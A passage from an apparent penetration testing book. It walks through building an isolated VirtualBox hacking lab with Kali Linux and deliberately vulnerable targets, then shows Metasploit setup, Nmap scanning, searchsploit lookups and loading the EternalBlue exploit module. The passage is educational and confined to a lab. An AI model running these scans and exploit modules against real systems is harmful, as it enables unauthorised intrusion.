Originally, large companies and organizations would have to buy entire servers to host services such as email and web applications. Each service was hosted on its own dedicated server. This, in turn, led to an increase in spending by companies with no added benefit to factors such as performance and resource efficiency, given the fact that most servers are configured to be high performance, have a high number of system resources such as RAM, and are configured with powerful CPUs. However, given the fact that companies were only able to host one service per server, most of the time, the system resources such as processing power and RAM would be underutilized, which made hosting inefficient. This type of traditional hosting infrastructure is illustrated in Figure 2.1:

Figure 2.1 – A traditional hosting infrastructure

This problem of resource inefficiency is what virtualization was created to solve. With virtualization in place, companies are now able to run multiple operating systems and host multiple services on one dedicated server. Virtualization ensures that system resources are properly and efficiently utilized, as a server can be configured to run as many services as possible within the constraints of the physical resources and the capacity of the server.

Figure 2.2 illustrates how, using a hypervisor such as VirtualBox, virtualization can be used to configure multiple operating systems and services to run on one server:

Figure 2.2 – A modern hosting infrastructure

In Figure 2.2, a server has been configured to virtualize three operating systems that each host their own services. This clearly outlines the benefits of utilizing virtualization not only for companies but also for individuals and professionals. Likewise, we will be using virtualization to host our target and attacker operating systems on one host system. For us to leverage virtualization technology, we will need to take a look at hypervisors.

Important note

A key feature offered or facilitated by virtualization is the isolation of guest operating systems, which provides security and stability to the infrastructure. Virtual machine isolation can be configured as needed; we will take a closer look at guest isolation and virtual networking when we set up our virtual machines.

Hypervisors

A hypervisor is a computer program that is responsible for creating, running, and managing virtual machines. It is responsible for facilitating the virtualization process and setting up the emulated environment required to run an operating system.

Hypervisors are split into two main categories based on their deployment and use case:

Type 1 hypervisors: These hypervisors are installed directly on top of hardware and, typically, run as operating systems. These types of hypervisors are also known as bare-metal hypervisors. Some examples of type 1 hypervisors include the following:

a) VMware ESX

b) Microsoft Hyper-V Server

c) Proxmox-VE

Figure 2.3 illustrates the deployment structure of a type 1 hypervisor, where the hypervisor management system is installed directly onto hardware and acts as the main operating system that creates and manages the virtual machines:

Figure 2.3 – The Type 1 hypervisor structure

Type 2 hypervisors: These hypervisors are installed directly on top of a host operating system such as Windows, Linux, or macOS. They operate like traditional programs as opposed to being run directly on top of the hardware.

Type 2 hypervisors do not have direct access to the system hardware; instead, type 2 hypervisors utilize the system resources that are available to the host operating system. Figure 2.2 illustrates a typical type 2 hypervisor setup where the hypervisor is installed directly on top of the host operating system. Some examples of free and commercial type 2 hypervisors are listed as follows:

a) Oracle VirtualBox (free)

b) VMware Player (free)

c) VMware Workstation Pro (commercial)

d) Parallels Desktop for macOS (commercial)

What is a virtual machine?

A virtual machine is an emulated operating system that runs directly on top of another operating system. Virtual machines have access to and can be allotted resources based on user requirements. For instance, we can specify the amount of RAM, the number of cores and logical processors, and the network interfaces and USB devices that the virtual machine will have access to. By default, virtual machines utilize a virtual disk image for storage and can be extended if required. Hypervisors such as VirtualBox also give us the ability to take snapshots of virtual machines as a form of redundancy. This can be extremely helpful in situations where virtual machines fail due to misconfigurations or system errors; you can easily restore a virtual machine to a previous snapshot.

What type of hypervisor should you use?

As mentioned earlier, the type of hypervisor you decide to use will depend on the nature of your deployment and individual use cases. If you have more than one computer or laptop, you can try out a type 1 hypervisor such as Proxmox-VE, which I personally use given the extended functionality it offers. If you intend on running your virtual hacking lab on a single computer or laptop, the obvious choice would be a type 2 hypervisor, as it can be installed directly onto the host operating system.

Now that we have a better understanding of what virtualization is and how we can leverage the technology to set up our virtual hacking lab, we can take a look at how to structure our lab.

Lab structure

Before we begin building our virtual lab, we need to understand how it will be structured, what software and operating systems we will use, and the network configuration we will implement. This will make the deployment phase much simpler and more straightforward.

The first step is to select our preferred hypervisor. In this book, we will be using Oracle VirtualBox, which is a type 2 hypervisor that is free and open source. It also offers great functionality out of the box. We will look at how to install and configure VirtualBox in the next section.

Operating systems

We will be deploying a robust variety of both Windows and Linux operating systems. This will give you the ability to simulate real-world attacks on different types of operating systems as opposed to a single target. You are also likely to encounter different operating systems during a typical penetration test. We will be using the following operating systems in our virtual hacking lab:

Windows 7
Windows Server 2008
Windows Server 2012
Windows 10
Metasploitable2
Kali Linux

We will be utilizing Kali Linux as our offensive operating system, and the other operating systems will be used as targets.

Important note

The Windows Server 2012 target virtual machine is optional. Most of the techniques and attacks demonstrated in this book can be replicated on Windows Server 2008.

Now that we have an idea of what hypervisor and operating systems we will be utilizing, we can set up our desired virtual network structure.

The virtual network topology

Figure 2.4 outlines the desired network topology that we will be using to set up our virtual network within VirtualBox. All virtual machines will be interconnected and isolated from any other external networks:

Figure 2.4 – The virtual network topology

VirtualBox allows us to create a completely isolated virtual network without the need for a router or switch. Each virtual machine will need to be assigned an IP address. We will be using the built-in virtual switch within VirtualBox to set up a Dynamic Host Configuration Protocol (DHCP)-based network where IP addresses will be distributed to the virtual machines automatically. This will simulate a real network environment; we will then have to perform some basic host discovery to manually map out the network and the hosts.

We now have a good understanding of the software that we will be using and the desired structure and network topology of our lab. The next step is to put all of these pieces together.

Building our lab

We are now ready to begin putting the various pieces together to build our virtual hacking lab. We will start by setting up our hypervisor of choice, VirtualBox. Feel free to use any other preferred hypervisor if you are already familiar with one. Most of these steps can also be recreated on VMware Workstation and VMware Player.

Installing and configuring VirtualBox

VirtualBox is a cross-platform open source type 2 hypervisor that offers excellent functionality and performance. The first step is to download the correct installation binary based on the host operating system you are running:

Open https://www.virtualbox.org/wiki/Downloads in your browser. You will be greeted with download links for the supported operating systems, as shown in Figure 2.5. Select your host operating system to begin the download:

Figure 2.5 – Downloading VirtualBox

After the installation binary has been downloaded, you will need to install it. The binary or executable will present you with a standard installation wizard. Follow the installation steps while keeping all the settings and configurations at their default settings. Once completed, you can now open up VirtualBox, and you will be greeted with a window similar to the one shown in Figure 2.6:

Figure 2.6 – The VirtualBox welcome screen

We now have VirtualBox installed and we can begin setting up and configuring the virtual network.

Configuring a virtual network

We will be using the network topology, as outlined in Figure 2.4, as our guide to set up and configure our virtual network adapter within VirtualBox.

VirtualBox provides a simple, yet powerful, virtual network manager that can facilitate the creation of adapters and network configurations with customizable parameters and functionality.

Our virtual network will require the following options and parameters:

IPv4 address mask: 10.10.10.1/24
A DHCP server enabled

Now that we have an understanding of the IP address mask, we can configure our virtual network:

To open up the Network manager, click on the menu in the upper-right corner of the Tools ribbon:

Figure 2.7 – VirtualBox Network tools

You will be greeted with a new window similar to Figure 2.8, prompting you to either Create or Remove the virtual network adapters.

In our case, we will create our own virtual network adapter that will be used to interconnect all our virtual machines under the same IP address mask. Click on the Create button to begin the configuration process:

Figure 2.8 – Creating a VirtualBox adapter

You should now be greeted with the virtual network manager screen. Based on our network requirements, as described earlier, we will need to set up a specific IP address mask and enable DHCP for automatic IP assignment. To configure our IP address mask, select the virtual network adapter we created and click on the Properties button to begin the customization process:

Figure 2.9 – Configuring a virtual network adapter

Within the configuration options for the adapter, ensure that you check the Configure Adapter Manually option, as demonstrated in Figure 2.9. Add the IP address mask we specified earlier. Once done, click on the Apply button to save the configuration.

We now need to enable the DHCP server. This can be enabled and configured under the DHCP Server tab in the Adapter Configuration menu. After enabling DHCP, you will need to provide the addressing schema and the default gateway address. You can use the configuration outlined in Figure 2.10:

Figure 2.10 – The VirtualBox DHCP configuration

After modifying the IP addressing schema for the DHCP server, click on Apply to save the configuration.

Now that we have created and configured our virtual network within VirtualBox, we can begin setting up our virtual machines within VirtualBox and adding them to the virtual network we have created.

Setting up our target virtual machines

We now have a fully configured hypervisor and virtual network in which we can operate; however, we also need to set up our target virtual machines, which will comprise two of the most popular operating systems used and adopted worldwide: Windows and Linux. Having practical experience in exploiting both operating systems is vital for a penetration tester, as you are likely to encounter both operating systems in real-world scenarios, although under different deployments and use cases.

As outlined earlier, our target virtual machines will comprise a robust mix of different versions of Windows and Linux, and some of them will have been preconfigured with vulnerabilities to aid and enhance the learning process.

Setting up Windows virtual machines

Given the popularity and adoption of the Windows operating system, it is essential to understand how to perform privilege escalation attacks on both Desktop versions of Windows and Windows Server deployments. For this reason, our lab will consist of the following versions of Windows:

Windows 10
Windows 7
Windows Server 2008

Windows operating systems require a license and need to be activated in order to function. However, we can leverage the benefits offered by Microsoft TechNet Evaluation Center. This offers between 90-day and 180-day trials for both desktop and server operating systems.

However, this service only offers the latest versions of Windows from Windows 10 and Windows Server 2016 to Windows Server 2012 and Windows 8.1. For our Windows 7 virtual machine, we can leverage the Microsoft Edge Legacy virtual machines that use older versions of Windows.

I will not be covering the Windows installation process. In this book, I will demonstrate the process of configuring and adding our virtual machines to the virtual network we have created.

We will start by downloading and configuring our required Windows virtual machines in the next sections.

Setting up the Windows 7 virtual machine

We will now take a look at how to set up our Windows 7 virtual machine on VirtualBox.

To set up the Windows 7 virtual machine, follow these steps:

First, you will need to download the Windows 7 virtual machine OVA file, which can be downloaded at https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/.
On the website, you will be prompted to select your virtual machine version and virtual machine platform, as illustrated in Figure 2.11. Ensure that you specify Win7 as the version and VirtualBox as the platform:

Figure 2.11 – Downloading the Windows 7 virtual machine image

You can now click on the Download button to download the compressed VirtualBox OVA file.
After you have downloaded and extracted the archive, you will be presented with an OVA file. The OVA file is a preconfigured and preinstalled virtual machine that does not need to be installed or configured; therefore, this will save time. The OVA file can be imported by double-clicking on it. This will open an Import Virtual Appliance screen, as shown here:

Figure 2.12 – VirtualBox OVA import

Ensure that you specify the Machine Base Folder to a directory or location that you have set up and configured for your virtual machines; this is the directory where the virtual machine will be imported to. After specifying the base folder, you can click on Import to begin the import process, as illustrated in Figure 2.13:

Figure 2.13 – The VirtualBox OVA import process

After the importation process has been completed, we can now add the virtual machine to the virtual network we have set up. To do this, select the virtual machine, as shown in the left-hand bar in Figure 2.14, and click on the Settings button to modify the virtual machine settings:

Figure 2.14 – The virtual machine settings

This will bring up the Options menu, where you can change the virtual machine name and resource allocation; however, we are also interested in adding the virtual machine to the virtual network. This can be done by clicking on the Network option, as shown in Figure 2.15, and specifying the adapter (in this case, Adapter 1 on the screen) as Host-only Adapter:

Figure 2.15 – Virtual machine network configuration

The virtual machine should now be configured to run and operate in the virtual network we have created. We can now move on to set up our Windows Server 2008 virtual machine also known as Metasploitable3.

Setting up the Metasploitable3 virtual machine

For our Windows Server 2008 virtual machine, we will be using an intentionally vulnerable virtual machine based on Windows Server 2008, called Metasploitable3. It was designed and created by Rapid7 to teach and demonstrate various penetration testing and privilege escalation techniques.

To learn more about Metasploitable3, you can read up on the release notes at https://blog.rapid7.com/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3/.

Setting up Metasploitable3 involves a manual building process; however, prebuilt virtual machine files also exist, which we can use to set up our virtual machine without any hassle or installation:

To get started with the setup process, we first need to download the OVA file.

The prebuilt Metasploitable3 Box file can be downloaded at https://app.vagrantup.com/rapid7/boxes/metasploitable3-win2k8.

After downloading the virtual machine file, the importation process is similar to that of Windows 7. Simply double-click on the OVA file and it will bring up the virtual machine import screen, as follows:

Figure 2.16 – Importing Metasploitable3

Specify your Base Directory virtual machine and begin the import process, as follows:

Figure 2.17 – Importing Metasploitable3

After the virtual machine has been imported, we can modify the virtual machine settings to configure Metasploitable3 to use the virtual network, as follows:

Figure 2.18 – Metasploitable3 network settings

Setting up the Windows 10 virtual machine

You will need to manually install the Windows 10 virtual machine, given that no prebuilt virtual machine files are offered by Microsoft. If you have no experience of installing Windows manually from an ISO file or a disc image, use the installation guide at https://www.extremetech.com/computing/198427-how-to-install-windows-10-in-a-virtual-machine:

To download the Windows 10 ISO, you will need to navigate to the following URL: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise. This will prompt you to specify the version of Windows 10 you would like to download. Go ahead and specify Windows 10 Enterprise and click on Continue. Afterward, you will need to provide your personal information to access the download:

Figure 2.19 – Downloading Windows 10 ISO

After downloading the ISO, you can create the virtual machine in VirtualBox and install Windows manually.
After successfully installing Windows 10, you can now modify the Network settings to configure the virtual machine to use the virtual network we have created, as shown in the following screenshot:

Figure 2.20 – Windows network settings

We have now successfully set up our Windows virtual machines and configured them to use our customized virtual network. Let's now take a look at how to set up our Linux virtual machine.

Setting up Linux virtual machines

Typically, Linux is set up and configured to run as a server, primarily for the hosting of services such as web applications, mail gateways, and database servers. This vastly increases the threat surface and the number of attack vectors that an attacker can exploit in order to gain initial access into a Linux system; for example, a vulnerability in the web server can lead to total system compromise.

For this reason, we will be using an intentionally vulnerable Linux virtual machine called Metasploitable2, which is also created by Rapid7 with the aim of teaching and demonstrating Linux exploitation and privilege escalation techniques.

Setting up Metasploitable2

Metasploitable2 is a free and intentionally vulnerable Ubuntu virtual machine that can be set up and deployed on any type 2 hypervisor. Let's take a look at how to set it up:

Metasploitable2 can be downloaded at https://sourceforge.net/projects/metasploitable/files/Metasploitable2/.
This URL will direct you to SourceForge, where you will be prompted to download the Metasploitable2 compressed archive, as follows:

Figure 2.21 – The Metasploitable2 archive

After downloading and extracting the archive, we are presented with a VMDK (Virtual Machine Disk) file that we will use to set up the virtual machine, which you can see in the list here:

Figure 2.22 – The Metasploitable2 archive

To set up Metasploitable2, we will need to create a new virtual machine. Click on the New button in VirtualBox, as shown in the following screenshot:

Figure 2.23 – The New VirtualBox virtual machine

We will now need to specify the virtual machine Name and the base directory under which the virtual machine will be installed. This is illustrated in Figure 2.24:

Figure 2.24 – Metasploitable2 configuration

We will now be prompted to specify the amount of RAM we wish to allocate to the virtual machine under the Memory Size option, as shown in Figure 2.25. Leave the option at the pre-configured amount, which should be 512 MB:

Figure 2.25 – Metasploitable2 Memory size setting

After specifying the desired memory, you will be prompted to specify whether you would like to create a virtual hard disk or use an existing one. Select the option to use your own virtual hard disk and specify the directory of the Metasploitable2.vmdk file that you have downloaded, as shown here:

Figure 2.26 – The Metasploitable2 VMDK specification

After creating the Metasploitable2 virtual machine, you now need to configure the virtual machine to use the custom virtual network. This can be done by modifying the Settings of the virtual machine and modifying the Network Adapter, as follows:

Figure 2.27 – The Metasploitable2 Network configuration

In this section, we have learned how to set up both Windows and Linux virtual machines and how to configure a customized isolated virtual network for our virtual hacking lab.

We have now set up all our target virtual machines and have configured them to run in the same virtual network. Our final virtual machine to set up is our main attacker virtual machine.

Setting up Kali Linux

Kali Linux is a Debian-based Linux distribution that is tailored toward penetration testers and security researchers. It is preconfigured and prepackaged with over 300 tools that can be used for penetration tests, security audits, and forensics. It is arguably the de facto standard for all industry professionals, as it offers a solid base to work from, various deployment and installation options, and an excellent software repository.

Kali Linux can be downloaded from the official Kali website (https://kali.org) and can be installed and configured in a plethora of ways. You can directly install it from an ISO or use a pre-configured OVA file for a preinstalled solution. In our case, as with the Windows 7 virtual machine, we will be using the OVA file, as it saves time and is much more convenient.

To begin, take the following steps:

To download the Kali Linux virtual appliance, navigate to the following link and download the 32-bit or 64-bit Kali Linux VirtualBox image based on your preferred system architecture (https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/#1572305786534-030ce714-cc3b):

Figure 2.28 – Kali Linux VirtualBox Images

After downloading and extracting the Kali Linux archive, the contents of the extracted directory will contain a Kali Linux OVA file that can be directly imported into VirtualBox. We can do this by double-clicking on the OVA image.
This will bring up the VirtualBox Import virtual appliance wizard, where we will need to specify the base directory under which our virtual machine will be stored.
The importing process will begin and will take a few minutes to complete:

Figure 2.29 – Importing Kali Linux OVA

After the import is complete, we will need to configure the Kali virtual machine to use the custom network we created. This can be done by modifying the settings of the virtual machine, as follows:

Figure 2.30 – Kali Linux network settings

We have now been able to set up our virtual hacking lab comprehensively, and we can move on to the testing phase. It involves starting up all of the virtual machines and performing a host discovery scan from Kali Linux to test the efficacy and functionality of our virtual network configuration.

Putting it all together

We can begin the test by starting up our virtual machines individually and running the following tests:

To log in to the Kali Linux virtual machine, use the credentials for the root user. The username will be root and the password will be toor. This can be changed by running the passwd utility in the Terminal, as follows:

Figure 2.31 – The Kali Linux password change functionality

After you have started your virtual machines, you can perform a network discovery scan with a utility called netdiscover, which uses Address Resolution Protocol (ARP) pings to detect hosts on a network. To run a network discovery scan, run the following command in your Kali Linux Terminal:

$ netdiscover -i <interface> -r 10.10.10.1/24

After running the netdiscover command, we will discover two hosts that are online and active as illustrated in Figure 2.32. This demonstrates our network configuration is working and that we can communicate with other hosts on the network:

Figure 2.32 – The results of netdiscover

We have now set up our Kali Linux virtual machine and configured it to run in the same virtual network and have tested our virtual network by performing a host discovery scan.

Summary

In this chapter, we began by understanding how to structure a virtual hacking lab and the role of virtualization. We then looked at how to set up and configure our hypervisor and a custom isolated network that could be used to interconnect our virtual machines. Later in the chapter, we set up our target virtual machines on VirtualBox and configured them to use our custom virtual network. We then ended the chapter by deploying Kali Linux in our virtual hacking lab.

Now that we have a functional virtual hacking lab, we can move on to the initial exploitation progress.

In the next chapter, we will begin the privilege escalation process by gaining our initial foothold on our target virtual machines. We will take a look at the various attack vectors that can be leveraged to give us access to the systems.

===== FILE 8/21: B17389_03_Final_PG_ePub.xhtml =====

Chapter 3: Gaining Access (Exploitation)

Before we can get our hands dirty with privilege escalation on both Windows and Linux, we need to explore the process of exploitation and the various exploitation techniques that can be leveraged, including how these techniques will affect the privilege escalation process.

Exploitation is a unique phase of the penetration testing life cycle. This is because it involves actively engaging with the target to determine or discover flaws or vulnerabilities that can be exploited in order to gain access.

Exploitation sets the scene for a successful penetration test and validates how far you will be able to get on a target system or network. Choosing the correct attack vector and exploitation framework or exploit is critical for gaining and maintaining access to a target system.

In this chapter, you will learn about the various ways of exploiting both Windows and Linux systems and how to leverage exploitation frameworks such as Metasploit.

In this chapter, we will cover the following topics:

Setting up Metasploit
Information gathering and footprinting
Gaining access
Technical requirements

To follow along with the demonstrations in this chapter, you need to ensure that you meet the following technical requirements:

A basic understanding of the Linux Terminal commands
Some familiarity with information gathering and footprinting techniques

You can view this chapter's code in action here: https://bit.ly/3m5qIaI

Setting up Metasploit

The Metasploit framework is an open source exploitation framework developed by H.D. Moore. It was originally written in Perl and later rewritten in Ruby. It is the de facto exploitation framework adopted by security professionals worldwide. It was acquired by Rapid7, in 2009, and is actively maintained and supported.

It was designed to streamline and enhance the penetration testing process. It does this by offering compartmentalized functionality in the form of modules based on various phases of the penetration testing methodology.

Metasploit can be used in almost every stage of the penetration testing life cycle, from information gathering to exploitation and privilege escalation. This robust functionality is what makes Metasploit an essential framework to learn for any penetration tester.

Metasploit has two versions available that offer varying functionality and features:

Metasploit Pro
Metasploit Community

During the course of this book, we will be utilizing the Metasploit framework version of Metasploit.

The Metasploit structure

Before we can begin setting up and using the Metasploit framework, first, we need to understand exactly how it is structured. Figure 3.1 outlines the components that make up the Metasploit framework and provides a high-level overview of how these components interact with each other:

Figure 3.1 – The Metasploit architecture

Given the subject matter of this book, we will not be taking a detailed look at how each of these components works and what their purpose is. Instead, we will focus on the most important element of the Metasploit framework in relation to exploitation, that is, the modules.

Important note

The Metasploit framework comes prepackaged. It is installed on Kali Linux and is also available in the official Kali repositories. As a result, we will not be discussing how to install Metasploit manually.

The best way to understand how Metasploit modules are structured is to browse through the directory on Kali Linux. The default Metasploit framework directory is located under /usr/share/metasploit-framework, and you can list the contents of the directory by running the following command:

ls -al /usr/share/metasploit-framework

Figure 3.2 outlines the contents of the default Metasploit framework directory on Kali Linux. As you can see, the directory contains binaries and directories based on their functionality. For example, we can see the msfdb binary that is responsible for interacting with the Metasploit framework database, and we can also see that the modules have been sorted into their own directory:

Figure 3.2 – Layout of the Metasploit directory

In the next section, we will take a look at how modules are further organized based on their type.

The Metasploit modules

Given the compartmentalized nature of the framework, Metasploit utilizes modules to segregate functionality. It does this by categorizing modules based on their specific functionality in respect to the role they play in the penetration testing life cycle. You can access this by viewing the contents of the module's directory under /usr/share/metasploit/framework/modules, as shown in Figure 3.3:

Figure 3.3 – The Metasploit module directory

The modules and their functionality are sorted as follows:

Exploits: These are pieces of code whose function is to exploit/leverage particular vulnerabilities within a system or program. Metasploit sorts these exploits further based on the target operating system, architecture, and service version.
Payloads: These are pieces of code that are typically bundled with an exploit and are used to execute additional commands and instructions after successful exploitation. For example, most remote access exploits utilize payloads to spawn reverse shells that grant direct access to attackers.
Auxiliary modules: These modules are used to perform a specific function, typically involving information gathering, fuzzing, and scanning for vulnerabilities.
Encoders: Encoders are used to encode and obfuscate payloads in order to avoid antivirus and signature-based detection. Encoders are also used to generate various types of payloads for specific use cases.
Post-exploitation: Post-exploitation modules are used after a successful exploitation to further increase control over the target system. Typically, they are used to perform the following tasks:

a) Privilege escalation

b) Credential harvesting and dumping hashes

c) Capturing user input on the target system

d) Executing processes and binaries

e) Setting up persistence

Now that we have familiarized ourselves with the various modules available in the Metasploit framework, we can begin setting up and configuring the Metasploit framework to use.

Setting up the Metasploit framework

To begin using the Metasploit framework, we will need to create and initialize the Metasploit database. You will need to perform the following steps:

Metasploit utilizes a PostgreSQL database backend for storage. First, we will need to ensure that the PostgreSQL service is running by inputting the following command:

sudo systemctl start postgresql

We can now initialize the Metasploit database by running the following command with root privileges:

sudo msfdb init

The initialization process will create the msf database and add the msf_test role to the database configuration.

We can now access the Metasploit framework console, which is also known as msfconsole. This can be done by running the following command in the Terminal:

msfconsole

As you can see, in Figure 3.4, starting msfconsole will take a few seconds:

Figure 3.4 – Staring msfconsole

After msfconsole has started up, you will be greeted with a banner and the msf prompt, as outlined in the following screenshot:

Figure 3.5 – The msfconsole banner

Before we can start using msfconsole, we need to verify that the Metasploit database is connected by running the following command within msfconsole:

db_status

As you can see, in Figure 3.6, the output informs us that msfconsole is connected to the database:

Figure 3.6 – The database status of Metasploit

The Metasploit framework should now be fully functional and ready to use. We can now move on to the next phase, which involves performing footprinting and active reconnaissance on our target virtual machines.

Information gathering and footprinting

Before we can exploit a target system, we need to accurately enumerate in order to retrieve important information from our targets. This phase of the penetration testing life cycle involves scanning and discovering hosts on a network. We scan these hosts to find the open ports and services that are running along with their versions. Additionally, we identify what operating systems the targets are running.

This is one of the most important phases of a penetration test, as it will determine the overall success of the exploitation phase. If we can gather and enumerate enough information from our targets, we can set up effective attacks and exploits. However, if we don't do this, our exploitation methods will be inefficient and may not yield any results.

We will begin the footprinting process by mapping out our virtual network to discover the target virtual machines and their corresponding IP addresses.

Network mapping with Nmap

Network Mapper (Nmap) is a free, open source network mapping utility that is used to discover hosts on a network, perform port scanning and service detection, and operate system detection. It does this by sending specially crafted packets to the targets and analyzing the responses that are sent from the target. Based on these responses, Nmap makes decisions as to whether a port is open, a target is online, or a firewall is in place.

We will be using Nmap in conjunction with Metasploit, where we will import our Nmap scan results into the Metasploit framework database. Nmap can generate output in a wide variety of formats. In our case, we will be exporting our scan results in XML format so that we can import them into the Metasploit database.

Ensure that you have the following target virtual machines running, as we will be utilizing them in this chapter:

Windows 7
Metasploitable3
Metasploitable2

Now that we have a clear picture of what hosts we will be targeting, we can begin the host discovery process with Nmap.

Host discovery with Nmap

The first step in footprinting is to discover the active hosts on a network and their corresponding IP addresses. Following this, we will scan these hosts individually to discover open ports, the services running, and the operating system that is being used:

We can perform a ping sweep scan on the entire virtual network subnet that we created in Chapter 2, Setting Up Our Lab, by running the following command:

sudo nmap -sn 10.10.10.1/24

As you can see, in Figure 3.7, we have four active hosts on our network. However, we still do not know what operating systems these hosts are running, making it very difficult to identify what IP addresses correspond to our virtual machines:

Figure 3.7 – Host discovery with Nmap

This Nmap scan will send ping requests to all hosts on the network and will determine whether a host is online based on the responses it receives.

To determine the operating systems that the target virtual machines are running, we can run an aggressive scan on our virtual network subnet with Nmap. This can be done by running the following command:

sudo nmap -A -T4 10.10.10.1/24

This scan will reveal the target operating system, the services running, the service versions, and the open ports running on the target systems. For instance, you should be able to determine what operating system a host is running by analyzing the operating system scan discovery results. Figure 3.8 outlines the OS discovery results for the virtual machine with an IP address of 10.10.10.7. As you can see, the OS discovery results indicate that the host is running Windows Server 2008 SP1, which means it is the Metasploitable3 virtual machine:

Figure 3.8 – OS discovery with Nmap

Note

You can also scan for specific information such as the operating system and service information by using the -O flag and the -sV flag.

Given the infrastructure of our virtual network and the use of Dynamic Host Configuration Protocol (DHCP), your virtual machine IP addresses might be assigned differently in comparison to the scenario here. In this case, the IP addresses correspond to the following hosts:

a) Metasploitable3: 10.10.10.4

b) Metasploitable2: 10.10.10.8

c) Windows 7: 10.10.10.7

Now that we have mapped out the hosts on our network, we can perform our individual scans on all the hosts on the network to determine what services are running and what ports are open.

To perform a comprehensive scan on a target, we will use a half-open advanced scan (SYN scan) in Nmap on all TCP ports. This will give us an accurate picture of what services and ports are open and are running on the target systems. We will also output the results into XML format for importation into msfconsole. This can be done by running the following Nmap scan:

sudo nmap -sS -A -T4 -p- <IP-ADDRESS> -oX output_file.xml

Important note

You will need to run this scan for all target virtual machines on the virtual network to determine what ports are open and what services are running. We will use this information in the next section, which involves performing a vulnerability analysis to determine potential vulnerabilities that can be exploited.

After running the scans, you should have your scan results saved in XML format. We can now begin importing the results into Metasploit. First, we need to start msfconsole.
After starting msfconsole, we can import the Nmap XML results by running the db_import command:

db_import /home/kali/Desktop/outpute_file.xml

This will import the scan results, and msfconsole will automatically add the target specified in the scan as a host, as demonstrated in the following screenshot:

Figure 3.9 – Importing the Nmap scan results

After importing the scan results, we can perform a vulnerability analysis on these results to identify potentially exploitable vulnerabilities. This process is extremely important as it will determine our chances of successful exploitation.

Vulnerability assessment

Vulnerability assessment is the process of identifying, quantifying, and prioritizing vulnerabilities within a system. This process can be automated through the use of vulnerability scanning systems such as OpenVAS and Nessus. However, automated vulnerability scans do not actively exploit vulnerabilities on systems, they only report them. This is where penetration tests come in. As a penetration tester, you will not only need to discover vulnerabilities but actively attempt to exploit them to verify their severity and risk.

Therefore, it is important, as a penetration tester, to learn how to perform manual vulnerability assessments on your targets as opposed to relying on automated vulnerability scanning tools. The ability to actively scan and detect vulnerabilities manually is an essential skill.

Based on the results we have gathered from our targets in the footprinting phase, we can begin the process of identifying vulnerabilities by closely examining the operating systems and services that are running on the target virtual machines.

Metasploitable3 vulnerabilities

We can begin analyzing the Nmap results for the Metasploitable3 virtual machine in msfconsole:

After starting msfconsole, we can list the active hosts to identify the Metasploitable3 virtual machine. You can do this by running the following command in msfconsole:

hosts -u

Figure 3.10 outlines all of the active hosts that we imported from our Nmap scan results. As you can see, msfconsole lists the target IP addresses and OS name. This information is useful; however, we need to identify the operating system and service versions:

Figure 3.10 – The msfconsole hosts

To display the services and service versions running on a particular host, we can use the following command in msfconsole:

services <IP-ADDRESS>

As outlined in Figure 3.11, we can identify that the operating system version is Windows Server 2008 R2, Service Pack 1:

Figure 3.11 – Metasploitable3 services

After some quick Google searching, I can identify an unpatched vulnerability in the operating system.

You can search for service and operating system-specific vulnerabilities through search engines such as Google. This process can be fine-tuned through the use of specific search engine operators, as demonstrated in Figure 3.12:

Figure 3.12 – Searching for vulnerabilities

This particular version of Windows Server 2008 is vulnerable to the MS17-010 vulnerability, which is code-named EternalBlue. For more information about this vulnerability, please refer to https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010. EternalBlue is an exploit that allows attackers to remotely execute arbitrary code by exploiting a vulnerability in Microsoft's Server Message Block (SMB) V1 protocol.

To verify that our target is vulnerable to this exploit, we can search for an auxiliary scanner module within msfconsole. This can be done by running the following command:

search eternalblue

As you can see, in Figure 3.13, this will display multiple modules matching the search term of eternalblue. However, we want to select the auxiliary module that will identify whether our target is vulnerable or not:

Figure 3.13 – The auxiliary module

To use the module, we can use the use command and specify the module name:

use auxiliary/scanner/smb/smb_ms17_010

After specifying the module, we will need to configure the scanner options. The main option that we need to modify is the RHOSTS option. The RHOSTS option is used to specify the target IP address, as shown in Figure 3.14:

Figure 3.14 – The RHOSTS option

We can set the RHOSTS option by running the following command:

set RHOSTS <IP-ADDRESS>

After setting the RHOSTS option, we can run the auxiliary module using the following command:

run

As demonstrated in Figure 3.15, our Metasploitable3 virtual machine is vulnerable to the EternalBlue exploit:

Figure 3.15 – The host is vulnerable

We have now identified and confirmed a potential vulnerability that could provide us with remote access to the target if successfully exploited. In the next section, we will take a look at the exploitation phase.

Metasploitable2 vulnerabilities

Similar to Metasploitable3, we can analyze the Nmap results that we imported for the Metasploitable2 virtual machine in msfconsole. Let's perform the following steps:

To display the services and service versions running on Metasploitable2, we can use the following command in msfconsole:

services <IP-ADDRESS>

As you can see, in Figure 3.16, Metasploitable2 has services running. Most of these are outdated given the service versions. We can also deduce that the server is running an older version of Ubuntu:

Figure 3.16 – Metasploitable2 services

We can utilize a useful tool, called searchsploit, which comes prepackaged with Kali Linux, to find potential exploits for the specific service versions that are running on the target. We can do this by running the following command:

searchsploit <Service Name & Version>

Note

Searchsploit is a utility that allows you to search for exploits available on exploit-db without having to directly access the exploit-db website manually.

If we use searchsploit to scan for vulnerabilities that affect the Samba smbd V3.0.20 service, we will discover that it is vulnerable to the command execution and has a corresponding Metasploit module that can be used to exploit this vulnerability. First, you will need to run the following command:

searchsploit samba 3.0.20

Figure 3.17 outlines the various exploits available for Samba smbd V3.0.20. We will be using the second exploit, which has a Metasploit module available:

Figure 3.17 – The Metasploitable2 vulnerability

Now that we have identified a potential exploit on our target systems, we can take a look at how to use the utilize exploit modules to gain access.

Gaining access

We can now get started with exploitation, which is the most exciting phase of the penetration testing life cycle. We have already identified our potential exploits on our target systems; therefore, we now need to run and test these exploits to gain our initial foothold.

The objective of the exploitation phase is to gain stable and persistent access to the target system, which will ensure that once a system is exploited, we will have persistent access even if the system is restarted.

Exploiting Metasploitable3

In the previous section, we were able to identify and verify the EternalBlue exploit as a potential access vector inside the Metasploitable3 host. Let's take a look at how we can use this exploit to gain access:

The first step is to fire up msfconsole and search for the EternalBlue exploit module by running the following command:

search eternalblue

The module we will use is the exploit module named exploit/windows/smb/ms17_010_eternalblue, as shown in the following screenshot:

Figure 3.18 – The Metasploitable3 eternalblue exploit

To use this module, we will run the following command:

use exploit/windows/smb/ms17_010_eternalblue

